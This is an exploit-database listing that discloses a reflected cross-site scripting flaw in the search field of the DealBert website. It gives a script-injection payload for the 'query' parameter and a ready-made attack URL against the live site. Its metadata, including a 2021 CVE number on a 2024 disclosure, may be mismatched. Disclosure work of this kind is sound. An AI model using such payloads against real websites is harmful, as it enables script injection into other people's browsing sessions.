Advertisement






DealBert Cross Site Scripting

CVE Category Price Severity
CVE-2021-39229 CWE-79 $500 High
Author Risk Exploitation Type Date
Dealbert High Remote 2024-02-28
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 0.323541 0.9356

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024020091

Below is a copy:

DealBert Cross Site Scripting
##########################
# Exploit Title: DealBert Cross Site Scripting
# Date: 2024/02/28
# Discovered By: Mr_Amir_Typer
# Tested on : Win11, Win10, Win8, Kali Linux
##########################
# Vulnerability is the site search field
query parameter have bug!
Inject this code after query=
"><script>alert("XSS%C2%A0vulnerability%C2%A0found%C2%A0by%C2%A0Mr_Amir_Typer")</script>
##########################
# Address:
https://dealbert.net/?%22%3E%3Cscript%3Ealert(%22XSS%C2%A0vulnerability%C2%A0found%C2%A0by%C2%A0Mr_Amir_Typer%22)%3C/script%3E
#############################
# Discovered By: Mr_Amir_Typer

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.